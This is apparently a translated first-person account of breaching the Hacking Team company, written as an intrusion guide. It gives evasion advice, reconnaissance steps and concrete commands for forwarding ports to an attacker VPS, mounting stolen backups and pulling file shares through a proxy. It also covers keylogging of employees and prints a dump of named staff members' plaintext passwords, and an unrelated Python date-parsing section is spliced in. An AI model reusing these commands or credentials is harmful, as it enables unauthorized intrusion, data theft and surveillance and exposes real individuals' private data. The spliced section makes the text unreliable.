Range, 2016/04/20 17:08

0x00 Hacking Team


Hacking Team is a company that helps governments hack and spy on journalists, politicians, and sometimes terrorists and criminals. Its CEO, Vincenzetti, likes to end his emails with the Nazi slogan “Boia Chi Molla” (death to quitters), and he has long claimed to have the technology to solve both the “Tor problem” and the “dark web problem”. But I’ve always doubted the effectiveness of his technique.

0x01 Be Careful


Unfortunately, our world is upside down. The more bad things you do, the richer you get. The more good things you do, the more likely you are to get caught. But luckily, thanks to the efforts of people like the Tor Project, you can reduce the chance of getting caught with these tips:

1) Encrypt your hard drive

If one day you get caught and the police take away your computer, then even though getting caught means you have already made plenty of mistakes, it is still far better to have encrypted your hard drive than not.

2) Use virtual machines and run all networks on Tor

This accomplishes two things: first, all your traffic is anonymous; second, your personal life is kept separate from your anonymous activity, so the two never mix.

3) Do not connect directly to the Tor network (optional)

Tor isn’t a panacea. The moment you connect to the Tor network may coincide with something bad happening, or something bad may happen just as you disconnect from it, and those timings can be correlated. It’s better to use someone else’s wifi, or go through a VPN or relay first, and only then connect to the Tor network.

0x02 Collecting Information


This process is boring, but it is very important, and the larger the target, the more likely it is to have exploitable bugs.

1. Technical information

The following sources are the main ones used:

1) Google

If you use the right search terms, you can turn up a surprising amount.

2) Subdomain collection

Generally speaking, most domains are hosted by third-party companies, and you need to find the IP ranges that actually belong to the target. Sometimes a nameserver also allows DNS zone transfers, which makes gathering information much easier.

3) Whois query and reverse query

You can also find many more subdomains by doing reverse lookups on the various Whois records and their IP ranges, although as far as I know there is no free reverse Whois lookup apart from Google hacking.

4) Port scanning and fingerprint extraction

Unlike the other techniques, this one interacts with the target’s own systems. I include it here because it is information gathering rather than an attack. The target’s intrusion detection system may alert on the scan, but don’t worry: the whole Internet gets scanned regularly.

Nmap is perfect for scanning, and it can also fingerprint the various services. For large networks, ZMap and Masscan are faster. WhatWeb and BlindElephant are good for fingerprinting web applications.

2. Social engineering information

For social engineering, it is important to collect information about employees, including their roles, contracts, operating systems, browsers, plug-ins, software, etc. Generally, the following methods are used:

1) Google

It’s the most useful tool here as well.

2) theHarvester and recon-ng

I mentioned these in the previous write-up, but there is more to them than that. They find a lot of information automatically and quickly, and it’s worth your time to read their official documentation.

3) LinkedIn

You can get a lot of information about employees through this site, and people inside a company are always inclined to talk to others.

4) Data.com

It works like a jigsaw puzzle, piecing together all kinds of information.

5) File metadata

You can find a lot of useful information in the metadata of the documents the company publishes.

0x03 Accessing the Intranet


There are many ways to get into an intranet. The way I got into the HT intranet was unusual and took far more effort than usual, so I’ll first mention the common ways of getting in, which I recommend.

1. Social engineering

Social engineering, especially spear phishing, is one of the more reliable infiltration techniques. For more tips, see the links at the end of this section. I didn’t want to try phishing against HT, because phishing is so familiar to them that they would be very wary. That would make it harder for me, and easier for them to find out what I was up to.

http://www.hacknbytes.com/2016/01/apt-pentest-con-empire.html
http://blog.cobaltstrike.com/2015/09/30/advanced-threat-tactics-course-and-notes/
http://www.netcomunity.com/lestertheteacher/doc/ingsocial1.pdf

2. Buying access

Many companies already have compromised computers inside them, thanks to hard-working Russians and their “traffic sellers” and “bot herders”. Almost every Fortune 500 network has some kind of compromised machine. But Hacking Team is a small company, and most of its employees are information security experts, so it’s highly unlikely that they have a compromised machine in-house.

3. Technical intrusion

In the Gamma write-up I already described a process for finding vulnerabilities:

http://pastebin.com/raw.php?i=cRYvK4jb

Hacking Team has a small range of public IP addresses:

inetnum: 93.62.139.32 - 93.62.139.47
descr:   HT public subnet

Their network was only slightly exposed to the Internet; for example, unlike Gamma, which requires a certificate to connect to its public address. HT’s public-facing servers were mainly a Joomla blog (joomscan showed nothing useful), a mail server, several routers, two VPNs, and a spam-filtering appliance. So my only way in was a 0day in Joomla, in Postfix, or in one of their other systems. An embedded-system 0day seemed the most promising to me, so I spent two weeks reverse engineering and found a command-execution 0day. That 0day hasn’t been fixed yet, so I can’t give any more details.

0x04 Prior preparation


Before the actual attack, I did a lot of testing and preparation: I wrote a backdoor for the hardware and compiled various tools for the embedded system:

1) busybox

Provides the standard Unix utilities that an embedded system lacks.

2) nmap

Scanning tool.

3) Responder.py

The go-to tool for man-in-the-middle attacks on an intranet.

4) python

Has to be there.

5) tcpdump

Packet capture.

6) dsniff

I prefer ettercap for sniffing the various passwords on an intranet, but it’s cumbersome to compile.

7) socat

A more capable netcat, used mainly for port forwarding.

8) screen

Lets you run commands in multiple windows; not strictly necessary.

9) Socks5 proxy host

So that proxychains can reach the intranet.

10) tgcd

Port forwarding to get through the firewall.

The worst thing that can happen is that you deploy your backdoor and tools, the system crashes, the admins come to look, and it’s all over. So I spent a week testing my various backdoors and exploits before the final deployment.

0x05 Look around


Now that I’m inside the intranet, I want to look around and decide what to do next. I put Responder.py into analysis mode (-A) and start with a slow Nmap scan.

0x06 Non-relational database


NoSQL, with its unauthenticated databases, is a godsend for me. Just as I was worried about not being able to get any further via MySQL, these unauthenticated databases appeared. Nmap found some on the HT intranet:

27017/tcp open  mongodb  MongoDB 2.6.5
| mongodb-databases:
|   ok = 1
|   totalSizeMb = 47547
|   totalSize = 49856643072
...
|_  version = 2.6.5

27017/tcp open  mongodb  MongoDB 2.6.5
| mongodb-databases:
|   ok = 1
|   totalSizeMb = 31987
|   totalSize = 33540800512
|   databases
...
|_  version = 2.6.5

These were RCS test instances. The audio that RCS captures is stored in MongoDB, and that is where the audio in the 400 GB torrent came from: they were spying on themselves, too.

0x07 Across a Network Segment


Watching HT develop their malware on the monitor was interesting, although it didn’t help me get any further. Their insecure backup systems were the next open door. According to their own documentation, their iSCSI system should have been on a separate network segment, but Nmap found it on 192.168.1.200/24:

...
3260/tcp open  iscsi?
| iscsi-info:
|   Target: iqn.2000-01.com.synology:ht-synology.name
|     Address: 192.168.200.66:3260,0
|_    Authentication: No authentication required

Nmap scan report for synology-backup.hackingteam.local (192.168.200.72)
...
3260/tcp open  iscsi?
| iscsi-info:
|   Target: iqn.2000-01.com.synology:synology-backup.name
|     Address: 10.0.1.72:3260,0
|     Address: 192.168.200.72:3260,0
|_    Authentication: No authentication required

iSCSI needs a kernel module that was hard to compile for my embedded system, so I forwarded the port to mount the target on a VPS instead.

VPS:             tgcd -L -p 3260 -q 42838
embedded system: tgcd -C -s 192.168.200.72:3260 -c VPS_IP:42838
VPS:             iscsiadm -m discovery -t sendtargets -p 127.0.0.1

iscsiadm discovered iqn.2000-01.com.synology, but there were problems when logging in, because the target advertises its address as 192.168.200.72 while I was reaching it on 127.0.0.1.

The solution:

iptables -t nat -A OUTPUT -d 192.168.200.72 -j DNAT --to-destination 127.0.0.1

And then:

iscsiadm -m node --targetname=iqn.2000-01.com.synology:synology-backup.name -p 192.168.200.72 --login

Here comes the file system! To mount:

vmfs-fuse -o ro /dev/sdb1 /mnt/tmp

Inside are backups of several virtual machines, and the mail server looks the most attractive. It is huge, but it can be mounted remotely and searched for what we want:

$ losetup /dev/loop0 Exchange.hackingteam.com-flat.vmdk
$ fdisk -l /dev/loop0
/dev/loop0p1            2048  1258287103   629142528    7  HPFS/NTFS/exFAT

so the offset is 2048 * 512 = 1048576
$ losetup -o 1048576 /dev/loop1 /dev/loop0
$ mount -o ro /dev/loop1 /mnt/exchange/

Now, in /mnt/exchange/WindowsImageBackup/exchange/Backup 2014-10-14 172311 we find the virtual machine’s disk, which can be mounted in turn:

vdfuse -r -t VHD -f f0f78089-d28a-11e2-a92c-005056996a44.vhd /mnt/vhd-disk/
mount -o loop /mnt/vhd-disk/Partition1 /mnt/part1

Finally, we can see everything from the old mail Exchange server under /mnt/part1.

0x08 From Secure Backup to Domain Administrator


What interested me most in the backup files was finding a reusable password or hash for getting onto the live machines. I used pwdump, cachedump and lsadump to look for possible passwords, and lsadump turned up the password of the besadmin service account:

_SC_BlackBerry MDS Connection Service
0000  16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0010  62 00 65 00 73 00 33 00 32 00 36 00 37 00 38 00  b.e.s.3.2.6.7.8.
      ...                                              !.!.!.

I use proxychains through the SOCKS proxy on the embedded device, and smbclient to try this password:

proxychains smbclient '//192.168.100.51/c$' -U 'hackingteam.local/besadmin%bes32678!!!'

Success! The password was still valid, and the account was a local administrator. Through the proxy I used Metasploit’s psexec_psh to get a Meterpreter session, then dumped the other passwords on that machine, including the domain administrator’s:

HACKINGTEAM  BESAdmin       bes32678!!!
HACKINGTEAM  Administrator  uu8dd8ndd12!
HACKINGTEAM  c.pozzi        P4ssword        <---- look! the sysadmin!
HACKINGTEAM  m.romeo        ioLK/(90
HACKINGTEAM  l.guerra       4luc@=.=
HACKINGTEAM  d.martinez     W4tudul3sp
HACKINGTEAM  g.russo        GCBr0s0705!
HACKINGTEAM  a.scarafile    Cd4432996111
HACKINGTEAM  r.viscardi     Ht2015!
HACKINGTEAM  a.mino         A!e?andra
HACKINGTEAM  m.bettini      Ettore&Bella0314
HACKINGTEAM  m.luppi        Blackou7
HACKINGTEAM  s.gallucci     1S9i8m4o!
HACKINGTEAM  d.milan        set!dob66
HACKINGTEAM  w.furlan       Blu3.B3rry!
HACKINGTEAM  d.romualdi     Rd13136f@#
HACKINGTEAM  l.invernizzi   L0r3nz0123!
HACKINGTEAM  e.ciceri       2O2571&2E
HACKINGTEAM  e.rabe         [email protected]!

0x09 Downloading Mail


Now that I have the domain administrator’s password, I have access to the heart of the business: the mail. Every step from here on risks giving me away, so just in case, I download the mail first. PowerShell helps a lot here, though I found a bug in its date handling. After I had the mail, it took me another two weeks to get the source code and the rest, and then I downloaded the new mail. The server is Italian, so the date format is day/month/year, and I used:

-ContentFilter {(Received -ge '05/06/2015') -or (Sent -ge '05/06/2015')}

This filter searches the mail server and downloads the new messages. The problem is that you get “date error: day cannot be greater than 12”, because the parser reads the first field as the month, and a month cannot be greater than 12. It appears that Microsoft’s engineers only tested their software with their own date format.
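The underlying problem is that “05/06/2015” is a valid date under both the day/month and the month/day convention, so a filter written in one convention is silently reinterpreted by a parser that assumes the other; only a date whose day exceeds 12 makes the mismatch visible as an error. The following Python is an added example, not code from the original post or from Microsoft’s cmdlets: it models the two readings of a slash-separated date, reproduces the “day cannot be greater than 12” failure, flags strings that would parse either way, and shows the ISO 8601 form that removes the ambiguity.

```python
from datetime import date


def parse_slash_date(text, day_first):
    """Read 'a/b/yyyy' as d/m/yyyy (day_first=True) or m/d/yyyy (day_first=False).
    Raises ValueError when the field taken as the month is above 12, which is the
    only case in which a parser using the wrong convention fails loudly."""
    a, b, year = (int(part) for part in text.split("/"))
    day, month = (a, b) if day_first else (b, a)
    if not 1 <= month <= 12:
        convention = "d/m/yyyy" if day_first else "m/d/yyyy"
        raise ValueError(f"month {month} is invalid: {text!r} was read as {convention}")
    return date(year, month, day)


def is_ambiguous(text):
    """True when the string parses under both conventions, giving two different dates."""
    a, b, _ = (int(part) for part in text.split("/"))
    return a <= 12 and b <= 12 and a != b


def misparse_outcome(text):
    """What happens when a d/m/yyyy string meets an m/d/yyyy parser: either the
    string 'error', or the wrong date it silently produces (ISO 8601)."""
    try:
        return parse_slash_date(text, day_first=False).isoformat()
    except ValueError:
        return "error"


def unambiguous(text, day_first):
    """Resolve a slash date under the convention the writer meant, as ISO 8601."""
    return parse_slash_date(text, day_first).isoformat()


if __name__ == "__main__":
    for s in ("05/06/2015", "13/06/2015"):
        print(s, "ambiguous" if is_ambiguous(s) else "unambiguous",
              "m/d parser gives:", misparse_outcome(s),
              "intended:", unambiguous(s, day_first=True))
```

The silent case is the dangerous one: “05/06/2015” yields May 6 instead of June 5 with no error at all. When writing such a filter in PowerShell, build the date explicitly (for example with `Get-Date -Year 2015 -Month 6 -Day 5`, or by casting an ISO string like `[datetime]'2015-06-05'`) rather than relying on a culture-dependent literal.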

0x0a Download file


Now that I’m domain administrator, I start downloading the various resources with smbclient through the proxy:

proxychains smbclient '//192.168.1.230/FAE DiskStation' -U 'HACKINGTEAM/Administrator%uu8dd8ndd12!' -Tc FAE_DiskStation.tar '*'

With that, everything had been downloaded.

0x0B Overview of Windows Domain Penetration


Before I wrap up the HT story, I want to give a quick overview of Windows intranet penetration.

1. Lateral movement (translator’s note: there seems to be no established Chinese term for this)

Here is a review of the various techniques used for moving around an intranet. Remote execution requires a local administrator’s password or hash. By far the most common approach is to dump passwords with Mimikatz on a machine where you already have administrator privileges. The better tools for escalating privileges are PowerUp and bypassuac. Remote movement:

1) psexec

The classic tool for this on Windows. You can use psexec, winexe, Metasploit’s psexec_psh, PowerShell’s Invoke-PsExec, or the built-in Windows “sc” command. For the Metasploit module, the PowerShell version and pth-winexe, the hash alone is enough; no password is required. This is the most general approach, but also the least stealthy: Event ID 7045 (Service Control Manager, service installed) is written to the event log. In my experience nobody notices this detail during the intrusion, but it is very helpful to investigators afterwards.

2) WMI

This is the stealthiest method. The WMI service is enabled on all Windows machines, but on anything other than servers the firewall does not allow it through by default. You can use wmiexec.py, pth-wmis, PowerShell’s Invoke-WMI, or the built-in wmic command on Windows. These need only the hash.

3) PSRemoting

This feature is off by default, and I don’t recommend turning it on. But if the system administrator has enabled it, it is very handy, especially since you can do everything from PowerShell easily without leaving much of a footprint.

4) GPO

If all of the above are blocked by a firewall and you are domain admin, you can use a GPO to give users a login script, install an MSI, run a scheduled task, or, as we saw with Mauro Romeo, use a GPO to enable the WMI service and open the firewall for it.

Local movement:

1) Token stealing

If you have administrative rights on one computer, you can use other users’ tokens to access domain resources. There are two main tools for this: incognito, and Mimikatz’s token::* commands.

2) MS14-068

You can exploit a bug in Kerberos to obtain domain administrator tickets.

3) Process injection

Any remote-access tool has process injection: for example the migrate command in Meterpreter, pupy, or the psinject command in PowerShell. You inject into a process that holds the token you need.

4) runas

This one is very useful because it does not require administrator privileges. It is a built-in Windows command; if you don’t have a GUI, you can do the same from PowerShell.

2. Maintaining access

Once you have access, the first thing you want to do is keep it. Persistence is generally only a challenge for creeps like HT who target individuals and political activists. For penetrating a company it is generally unimportant, because companies rarely switch their machines off. It is unnecessary for infiltrating a company and only increases the chance of discovery. You can read more about persistence techniques at the links below.

http://www.harmj0y.net/blog/empire/nothing-lasts-forever-persistence-with-empire/
http://www.hexacorn.com/blog/category/autostart-persistence/
https://blog.netspi.com/tag/persistence/

3. Internal reconnaissance

The best tool for exploring Windows networks is PowerView. The links below are worth reading:

http://www.harmj0y.net/blog/tag/powerview/
http://www.harmj0y.net/blog/powershell/veil-powerview-a-usage-guide/
http://www.harmj0y.net/blog/redteaming/powerview-2-0/
http://www.harmj0y.net/blog/penetesting/i-hunt-sysadmins/
http://www.slideshare.net/harmj0y/i-have-the-powerview

Of course, PowerShell is also an effective tool, but it isn’t available on the 2003 and 2000 machines, where you can still use the old “net view” command. Other techniques I like are:

1) Listing files

From a domain administrator account you can use PowerView to list every file on the network’s shares:

Invoke-ShareFinderThreaded -ExcludedShares IPC$,PRINT$,ADMIN$ |
select-string '^(.*) \t-' | %{dir -recurse $_.Matches[0].Groups[1] |
select fullname | out-file -append files.txt}

Then you can download as many files as you want.

2) Reading mail

We already know that mail can be downloaded with PowerShell, and it contains a lot of useful information.

3) Checking internal portals

This is where many businesses keep their important information. These can also be downloaded with PowerShell.

4) Monitoring employees

One of my interests is finding the system administrators. Monitoring Christian Pozzi (an administrator at HT) gave me access to the Nagios server, and through it to “Rete Sviluppo”. With a combination of Get-Keystrokes and Get-TimedScreenshot from PowerSploit, deployed via GPO, you can watch any employee, or even an entire domain.

0x0C Hunting the System Administrators


Reading their internal documentation, I found that I still lacked access to something very important: “Rete Sviluppo”, an isolated network holding the RCS source code. The system administrators always have access to everything, so I searched Mauro Romeo’s and Christian Pozzi’s computers to see how they managed the Sviluppo network, and whether there were other systems I was interested in. Their computers were domain members, so getting onto them was easy. Mauro Romeo’s computer had no ports open, so I enabled the WMI port and ran Meterpreter. To monitor their keyboards and screens I used a lot of Metasploit’s gather modules, then searched around for files of interest. I found that Pozzi had an encrypted volume, and when he mounted it I copied all the files. Their passwords turned out to be of no use to me, which felt ridiculous, because Mimikatz and the keylogger had already given everything away.

0x0d Bridge


Pozzi’s encrypted volume contained a lot of plaintext passwords. Some of them were for the Nagios server, which has access to the Sviluppo network for monitoring purposes. I had found a bridge into the isolated network. Even without the password to that server, it had a publicly known command-execution vulnerability.

0x0e Reuses and resets the password


Reading the mail, I saw that Daniele Milan had access to a Git machine. I already had his Windows password (from Mimikatz); I tried it on the Git machine and it worked, with sudo too. To get my hands on the GitLab server and their Twitter account, I used the mail server and the “Forgot password” feature to reset the passwords.

0x0f Summary


That’s how I took on a corporation and ended its abuses of human rights. This is the beauty and asymmetry of hacking: with 100 hours of work, one person can undo years of work by a multi-million-dollar company. Hacking gives the underdog a chance to fight and win.

Hacking guides usually end with a disclaimer: this is only a small lesson for becoming an ethical hacker, don’t hack other people’s systems without permission, and so on. I often say this, but often do the opposite. Leaking documents, seizing money from banks and trying to make ordinary people’s computers more secure is ethical hacking. But a lot of people who call themselves “ethical hackers” actually work for the people who pay them more, and who deserve to be hacked more.

HT sees itself as part of Italian innovation, but to me, Vincenzetti, his company and his cronies in the police and the government all stand in the Italian fascist tradition. To the victims of the raid on the Armando Diaz school, and to all those who have suffered at the hands of Italian fascism.

The original: https://ghostbin.com/paste/6kho7?luicode=10000359, translated by security toolkit.